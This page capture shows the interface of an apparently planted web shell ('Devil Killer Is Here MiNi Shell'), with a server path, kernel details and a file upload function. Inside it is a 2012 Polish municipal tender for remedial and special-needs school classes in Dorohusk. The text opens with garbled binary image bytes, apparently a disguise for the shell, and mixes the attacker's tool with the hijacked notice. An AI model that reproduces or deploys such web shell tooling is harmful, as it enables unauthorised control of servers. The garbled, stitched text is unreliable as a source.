JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121219/519534-N-2012.html

<p class="kh_header"><b>Dorohusk: Prowadzenie zajęć dydaktyczno - wyrównawczych i rozwijających zainteresowania oraz specjalistycznych w ramach projektu pn: Lepszy start w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego.
ZSO w Dorohusku Szkoła Podstawowa w Dorohusku</b><br>
<b>Numer ogłoszenia: 519534 - 2012; data zamieszczenia: 19.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Dorohusk , ul. I Armii Wojska Polskiego 50, 22-175 Dorohusk, woj. lubelskie, tel. 82 5661089 w. 20, faks 82 5661061.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dorohusk.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie zajęć dydaktyczno - wyrównawczych i rozwijających zainteresowania oraz specjalistycznych w ramach projektu pn: Lepszy start w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego.
ZSO w Dorohusku Szkoła Podstawowa w Dorohusku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na: Prowadzeniu zajęć dydaktyczno -wyrównawczych  i rozwijających zainteresowania oraz specjalistycznych w ramach projektu pt: Lepszy start współfinansowanego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych. Zamawiający podzielił zamówienie na 9 części. 
2.	Szczegółowy opis przedmiotu zamówienia w podziale na poszczególne części - zawiera załącznik nr 1 do SIWZ.
3.	Informacje wspólne dla wszystkich części 
1)	Zajęcia prowadzone będą w formie zajęć pozalekcyjnych. Dokładne godziny rozpoczęcia i zakończenia zajęć zostaną ustalone w zależności od planu zajęć dzieci, zakwalifikowanych do udziału w projekcie. 
2)	Zajęcia odbywać się będą w budynku szkoły, do której uczęszczają dzieci, objęte projektem. Zamawiający zapewni sale lekcyjne zatem Wykonawca nie będzie ponosił z tego tytułu dodatkowych kosztów.
3)	Wykonawca ma rozpocząć prowadzenie zajęć w terminie uzgodnionym z Zamawiającym.
4)	Jedna godzina zajęć dla zadań od nr 1 do nr 4 i od nr 9 - musi trwać 45 minut.
5)	Jedna godzina zajęć dla zadań od nr 5 do nr 8 - musi trwać 60 minut.
6)	Wykonawca w terminie 7 dni od podpisania umowy przygotuje szczegółowy program oraz harmonogram zajęć w formie pisemnej i przedstawi go do zatwierdzenia Zamawiającemu. Zajęcia ujęte w harmonogramie mają być terminowo rozpoczynane i kończone.
7)	Wykonawca zapewni osoby do realizacji zamówienia posiadające odpowiednie kwalifikacje i doświadczenie.
8)	Wykonawca zobowiązany jest również do:
a)	prowadzenia dokumentacji zajęć - przez okres trwania projektu. Jako dokumentację zajęć rozumie się opracowanie programu zajęć, prowadzenie dziennika zajęć i prowadzenie list obecności. Na koniec każdego miesiąca Wykonawca przekaże Zamawiającemu raport, zawierający listy obecności oraz wymiar przeprowadzonych zajęć z podziałem na grupy;
b)	przekazania uczestnikom zajęć ewentualnych materiałów dydaktycznych (ich cena ma być wliczona w cenę oferty, tak aby Zamawiający nie ponosił dodatkowych kosztów z tego tytułu); materiały dydaktyczne nie mogą propagować stereotypowych ról kobiecych i męskich.
c)	Wykonawca zobowiązany jest również do realizacji obowiązków związanych z monitorowaniem, ewaluacją projektu - szczegółowo opisanych w § 6 umowy stanowiącej załącznik nr 5 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5, 80.41.00.00-1, 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>poprzez złożenie oświadczenia. Ocena spełnienia warunku nastąpi na podstawie złożonych dokumentów i oświadczeń według kryterium spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>poprzez złożenie oświadczenia. Ocena spełnienia warunku nastąpi na podstawie złożonych dokumentów i oświadczeń według kryterium spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>poprzez złożenie oświadczenia. Ocena spełnienia warunku nastąpi na podstawie złożonych dokumentów i oświadczeń według kryterium spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Dla części nr od nr 1 do nr 4, nr 6 i nr 9- wykształcenie zgodne z przedmiotem nauczania objętym zamówieniem wraz z odpowiednim przygotowaniem pedagogicznym do prowadzenia zajęć w szkole podstawowej zgodnie z rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenie szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009 r., Nr. 50, poz. 400 ze zm.);
2. Dla części nr 5-  kwalifikacje zawodowe uprawniające do samodzielnego prowadzenia zajęć w zakresie odpowiadającym rodzajowi zajęć, które będzie realizował:- wykształcenie wyższe o specjalności oligofrenopedagogika lub wykształcenie wyższe i studia podyplomowe o specjalności oligofrenopedagogika. 
3. Dla części nr 7- kwalifikacje zawodowe uprawniające do samodzielnego prowadzenia zajęć w zakresie odpowiadającym rodzajowi zajęć, które będzie realizował: wykształcenie wyższe o specjalności pedagogika ogólna lub wykształcenie wyższe i studia podyplomowe o specjalności pedagogika ogólna.
4. Dla części nr 8- kwalifikacje zawodowe uprawniające do samodzielnego prowadzenia zajęć w zakresie odpowiadającym rodzajowi zajęć, które będzie realizował: wykształcenie wyższe o specjalności logopedia lub wykształcenie wyższe i studia podyplomowe o specjalności logopedia.
Ocena spełnienia warunku nastąpi na podstawie złożonych dokumentów i oświadczeń według kryterium spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>poprzez złożenie oświadczenia. Ocena spełnienia warunku nastąpi na podstawie złożonych dokumentów i oświadczeń według kryterium spełnia- nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pełnomocnictwo w przypadku składania oferty wspólnej</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dorohusk.bip.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Dorohusku
ul. I armii Wojska Polskiego 50
22-175 Dorohusk
pokój nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.12.2012 godzina 10:00, miejsce: Urząd Gminy w Dorohusku
ul. I armii Wojska Polskiego 50
22-175 Dorohusk
pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Prowadzeniu zajęć dydaktyczno -wyrównawczych  i rozwijających zainteresowania oraz specjalistycznych w ramach projektu pt: Lepszy start współfinansowane będzie w ramach Programu Operacyjnego Kapitał Ludzki Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zajęcia dydaktyczno- wyrównawcze z języka polskiego i historii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia mają na celu doskonalenie u uczniów umiejętności językowych w zakresie sprawności mówienia, słuchania, czytania i pisania, zwiększenie zasobu słownictwa, udoskonalenie umiejętności wykorzystania go w różnych formach wypowiedzi oraz ćwiczenie umiejętności stosowania zasad ortograficznych i interpunkcyjnych - zgodnie z podstawą programową kształcenia ogólnego w klasach III-VI szkoły podstawowej. Pozwolą na doskonalenie umiejętności interpretacji różnorodnych źródeł historycznych, na sprawne posługiwanie się chronologią historyczną. Wyrobią u uczniów zainteresowanie problematyką społeczną i obywatelską.
Zajęcia będą się odbywały w okresie od stycznia do czerwca 2013 r. z częstotliwością min 
4 h miesięcznie
Grupa uczniów: 4 gr po 8 osób, (32 uczniów)
Łączna liczba godzin przewidziana do realizacji zadania - 120, w tym j. polski 60 h i historia - 60 h),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zajęcia dydaktyczno- wyrównawcze z przedmiotów matematycznych i przyrodniczych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia maja na celu wyrównanie braków edukacyjnych oraz rozwinięcie wiedzy 
i umiejętności z zakresu matematyki i przyrody zgodnie z podstawą programową kształcenia ogólnego w klasach III i VI szkoły podstawowej Zajęcia będą się odbywały w okresie od stycznia do czerwca 2013 r. z częstotliwością min
 4 h miesięcznie
Grupa uczniów: 6 gr po 8 osób (48 uczniów)
Łączna liczba godzin przewidziana do realizacji zadania - 180, w tym matematyka 90 hi przyroda 90 h..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zajęcia rozwijające zainteresowania z matematyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem głównym zajęć jest wsparcie dla uczniów zdolnych, którzy swoją wiedzą wykraczają poza program kształcenia ogólnego z zakresu matematyki w klasach III i VI nauczania. Zajęcia będą się odbywały w okresie od stycznia do czerwca 2013 r. z częstotliwością min 4 h miesięcznie
Grupa uczniów: 3 gr po 6 osób (18 uczniów) 
Łączna liczba godzin przewidziana do realizacji zadania - 90,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zajęcia rozwijające zainteresowania z j. nowożytnego (j. angielski).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Głównym celem zajęć jest wsparcie dla uczniów zdolnych, którzy swoją wiedzą wykraczają poza program nauczania z języka angielskiego kształcenia ogólnego w klasach IV-V.  Zajęcia będą się odbywały w okresie od stycznia do czerwca 2013 r. z częstotliwością min 4 h miesięcznie
Grupa uczniów: 2 gr po 8 osób, (16 uczniów)
Łączna liczba godzin przewidziana do realizacji zadania - 30,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zajęcia rewalidacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Głównym celem zajęć rewalidacyjnych jest rozwijanie autonomii ucznia niepełnosprawnego poprzez jego personalizację oraz socjalizację, a także - w ramach posiadanych przez niego realnych możliwości - wyposażenie w takie umiejętności, aby:
1)mógł porozumiewać się z otoczeniem w najpełniejszy sposób, werbalnie lub pozawerbalnie,
2)zdobył maksymalną niezależność życiową w zakresie zaspokajania potrzeb życiowych,
3)był zaradny w życiu codziennym adekwatnie do własnego, indywidualnego poziomu sprawności i umiejętności,
4)mógł uczestniczyć w różnych formach życia społecznego na równi z innymi członkami danej zbiorowości, znając i przestrzegając ogólnie przyjęte normy współżycia społecznego, zachowując prawo do swojej inności.
 Zajęcia będą się odbywały w okresie od stycznia do czerwca 2013 r. z częstotliwością min 4 h miesięcznie KL V
Grupa uczniów: 2 gr po1osobie.
Łączna liczba godzin przewidziana do realizacji zadania - 60,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zajęcia korekcyjno-kompensacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia mają na celu:
- umożliwienie uczniom opanowania podstawowych umiejętności czytania i pisania;
- wyrównywanie braków w wiadomościach i umiejętnościach będących przyczyną trudności szkolnych;
- przezwyciężanie skutków niepowodzeń szkolnych tj. trudności w czytaniu, pisaniu i liczeniu oraz przywróceniu prawidłowych postaw uczniów wobec dalszej nauki poprzez:
a) usprawnianie funkcji najbardziej zaburzonych,
b) utrwalanie zdobytych umiejętności,
uwzględnianie indywidualnych potrzeb dziecka.
Zajęcia będą się odbywały w okresie od stycznia do czerwca 2013 r. z częstotliwością min 4 h miesięcznie
Kl. IV-VI
Grupa uczniów: 1 gr 5osób.
Łączna liczba godzin przewidziana do realizacji zadania - 30,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zajęcia socjoterapeutyczne i psychoedukacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia mają na celu pomoc uczniom wykazującym trudności w uczeniu się, zagrożonym niedostosowaniem społecznym  lub uzależnieniem, a także mającym problemy rodzinne lub środowiskowe oraz wymagających wsparcia o charakterze socjoterapeutycznym.
Zajęcia będą się odbywały w okresie od stycznia do czerwca 2013 r. z częstotliwością min
1h miesięcznie Kl IV-VI
Grupa uczniów: 1 gr 5osób.
Łączna liczba godzin przewidziana do realizacji zadania - 8,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zajęcia logopedyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia mają na celu kształtowanie prawidłowej mowy poprzez korygowanie zaburzeń 
w zakresie strony fonetycznej, leksykalnej i gramatycznej wypowiedzi, stymulowanie opóźnionego rozwoju mowy, doskonalenie mowy już ukształtowanej, wdrażanie do praktycznego wykorzystania nawyków poprawnej wymowy przyswojonej w toku ćwiczeń. Zajęcia powinny zostać poprzedzone wstępną diagnozą logopedyczną, która pozwoli na wybór właściwej metody i ustalenie ogólnych zasad postępowania. 
Zajęcia będą się odbywały w okresie od stycznia do czerwca 2013 r. z częstotliwością min  4 h miesięcznie Kl III
Grupa uczniów: 1 gr 5osób.
Łączna liczba godzin przewidziana do realizacji zadania - 30,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zajęcia z gimnastyki dla uczniów z obniżoną sprawnością fizyczną.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wiele dzieci najchętniej spędza czas przed telewizorem lub komputerem. Nierzadko rodzicom ciężko jest zmobilizować swoje pociechy do wysiłku fizycznego, jednak warto podjąć się tego zadania, ponieważ siedzący tryb życia ma niekorzystny wpływ na zdrowie dzieci.
Aktywność ruchowa nie tylko przyczynia się do lepszej kondycji i pomaga uniknąć poważnych problemów zdrowotnych, na przykład chorób naczyniowo-sercowych, czy poważnych wad postawy. Zajęcia proponowane w tym projekcie mają na celu pokazanie dzieciom różnorodnych form spędzania aktywnie czasu wolnego.
Kl III-VI
Zajęcia będą się odbywały w okresie od stycznia do czerwca 2013 r. z częstotliwością min  4 h miesięcznie
Grupa uczniów: 1 gr 10 osób.
Łączna liczba godzin przewidziana do realizacji zadania - 30,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com